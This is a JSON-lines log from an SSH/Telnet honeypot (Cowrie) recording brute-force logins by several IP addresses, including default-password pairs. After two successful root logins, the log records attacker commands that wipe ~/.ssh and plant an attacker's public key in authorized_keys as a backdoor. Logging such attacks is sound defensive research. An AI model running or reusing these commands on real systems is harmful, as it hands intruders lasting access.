{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:40:39.272147Z","src_ip":"212.227.235.229","session":"6b869a0ebb0e"}
{"eventid":"cowrie.login.failed","username":"test","password":"testtest","message":"login attempt [test/testtest] failed","sensor":"my-vps","timestamp":"2025-09-08T13:40:39.813349Z","src_ip":"212.227.235.229","session":"6b869a0ebb0e"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:40:40.941425Z","src_ip":"212.227.235.229","session":"6b869a0ebb0e"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":53030,"dst_ip":"1.2.3.4","dst_port":22,"session":"89e6c44b1fb3","protocol":"ssh","message":"New connection: 134.199.174.250:53030 (1.2.3.4:22) [session: 89e6c44b1fb3]","sensor":"my-vps","timestamp":"2025-09-08T13:40:53.410972Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:40:53.412132Z","src_ip":"134.199.174.250","session":"89e6c44b1fb3"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:40:53.745024Z","src_ip":"134.199.174.250","session":"89e6c44b1fb3"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"admin123","message":"login attempt [mysql/admin123] failed","sensor":"my-vps","timestamp":"2025-09-08T13:40:54.937006Z","src_ip":"134.199.174.250","session":"89e6c44b1fb3"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:40:56.271604Z","src_ip":"134.199.174.250","session":"89e6c44b1fb3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37182,"dst_ip":"1.2.3.4","dst_port":23,"session":"ffc3a20353c5","protocol":"telnet","message":"New connection: 212.227.235.229:37182 (1.2.3.4:23) [session: ffc3a20353c5]","sensor":"my-vps","timestamp":"2025-09-08T13:41:05.286191Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39155,"dst_ip":"1.2.3.4","dst_port":23,"session":"cc88d0f51825","protocol":"telnet","message":"New connection: 212.227.235.229:39155 (1.2.3.4:23) [session: cc88d0f51825]","sensor":"my-vps","timestamp":"2025-09-08T13:41:12.114916Z"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.35.31","src_port":24086,"dst_ip":"1.2.3.4","dst_port":22,"session":"2700c3dc7a47","protocol":"ssh","message":"New connection: 49.247.35.31:24086 (1.2.3.4:22) [session: 2700c3dc7a47]","sensor":"my-vps","timestamp":"2025-09-08T13:41:16.959612Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:41:16.960669Z","src_ip":"49.247.35.31","session":"2700c3dc7a47"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:41:17.255515Z","src_ip":"49.247.35.31","session":"2700c3dc7a47"}
{"eventid":"cowrie.login.success","username":"root","password":"!Z2x3c4v","message":"login attempt [root/!Z2x3c4v] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:41:18.444980Z","src_ip":"49.247.35.31","session":"2700c3dc7a47"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:41:19.058056Z","src_ip":"49.247.35.31","session":"2700c3dc7a47"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:41:19.058840Z","src_ip":"49.247.35.31","session":"2700c3dc7a47"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:41:19.060096Z","src_ip":"49.247.35.31","session":"2700c3dc7a47"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:41:19.356002Z","src_ip":"49.247.35.31","session":"2700c3dc7a47"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:41:20.032860Z","src_ip":"49.247.35.31","session":"2700c3dc7a47"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T13:41:20.033539Z","src_ip":"49.247.35.31","session":"2700c3dc7a47"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T13:41:20.319121Z","src_ip":"49.247.35.31","session":"2700c3dc7a47"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:41:20.319997Z","src_ip":"49.247.35.31","session":"2700c3dc7a47"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.35.31","src_port":8627,"dst_ip":"1.2.3.4","dst_port":22,"session":"5608d1440329","protocol":"ssh","message":"New connection: 49.247.35.31:8627 (1.2.3.4:22) [session: 5608d1440329]","sensor":"my-vps","timestamp":"2025-09-08T13:41:20.602318Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:41:20.604838Z","src_ip":"49.247.35.31","session":"5608d1440329"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:41:20.897325Z","src_ip":"49.247.35.31","session":"5608d1440329"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":63500,"dst_ip":"1.2.3.4","dst_port":22,"session":"5ea54afd4a2a","protocol":"ssh","message":"New connection: 217.72.205.35:63500 (1.2.3.4:22) [session: 5ea54afd4a2a]","sensor":"my-vps","timestamp":"2025-09-08T13:41:21.698719Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:41:21.700142Z","src_ip":"217.72.205.35","session":"5ea54afd4a2a"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T13:41:22.076697Z","src_ip":"49.247.35.31","session":"5608d1440329"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":38684,"dst_ip":"1.2.3.4","dst_port":22,"session":"431e9602fdbc","protocol":"ssh","message":"New connection: 134.199.174.250:38684 (1.2.3.4:22) [session: 431e9602fdbc]","sensor":"my-vps","timestamp":"2025-09-08T13:41:22.653454Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:41:22.654817Z","src_ip":"134.199.174.250","session":"431e9602fdbc"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:41:22.927927Z","src_ip":"134.199.174.250","session":"431e9602fdbc"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:41:23.379312Z","src_ip":"49.247.35.31","session":"5608d1440329"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.35.31","src_port":44789,"dst_ip":"1.2.3.4","dst_port":22,"session":"2dc0329223ba","protocol":"ssh","message":"New connection: 49.247.35.31:44789 (1.2.3.4:22) [session: 2dc0329223ba]","sensor":"my-vps","timestamp":"2025-09-08T13:41:23.661229Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:41:23.675653Z","src_ip":"49.247.35.31","session":"2dc0329223ba"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"1234","message":"login attempt [mysql/1234] failed","sensor":"my-vps","timestamp":"2025-09-08T13:41:23.889087Z","src_ip":"134.199.174.250","session":"431e9602fdbc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:41:23.974460Z","src_ip":"49.247.35.31","session":"2dc0329223ba"}
{"eventid":"cowrie.session.closed","duration":12.08638858795166,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:41:24.201208Z","src_ip":"212.227.235.229","session":"cc88d0f51825"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:41:25.138019Z","src_ip":"49.247.35.31","session":"2dc0329223ba"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:41:25.183245Z","src_ip":"134.199.174.250","session":"431e9602fdbc"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:41:25.444656Z","src_ip":"49.247.35.31","session":"2700c3dc7a47"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:41:25.445575Z","src_ip":"49.247.35.31","session":"2dc0329223ba"}
{"eventid":"cowrie.session.closed","duration":31.343416929244995,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:41:36.629525Z","src_ip":"212.227.235.229","session":"ffc3a20353c5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39998,"dst_ip":"1.2.3.4","dst_port":22,"session":"665a38423c2c","protocol":"ssh","message":"New connection: 212.227.235.229:39998 (1.2.3.4:22) [session: 665a38423c2c]","sensor":"my-vps","timestamp":"2025-09-08T13:41:40.882927Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:41:40.883614Z","src_ip":"212.227.235.229","session":"665a38423c2c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:41:41.041874Z","src_ip":"212.227.235.229","session":"665a38423c2c"}
{"eventid":"cowrie.login.success","username":"root","password":"ABCabc123456","message":"login attempt [root/ABCabc123456] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:41:41.563894Z","src_ip":"212.227.235.229","session":"665a38423c2c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:41:41.915967Z","src_ip":"212.227.235.229","session":"665a38423c2c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:41:41.916629Z","src_ip":"212.227.235.229","session":"665a38423c2c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:41:41.917388Z","src_ip":"212.227.235.229","session":"665a38423c2c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:41:42.041773Z","src_ip":"212.227.235.229","session":"665a38423c2c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:41:42.297133Z","src_ip":"212.227.235.229","session":"665a38423c2c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T13:41:42.297783Z","src_ip":"212.227.235.229","session":"665a38423c2c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T13:41:42.436902Z","src_ip":"212.227.235.229","session":"665a38423c2c"}
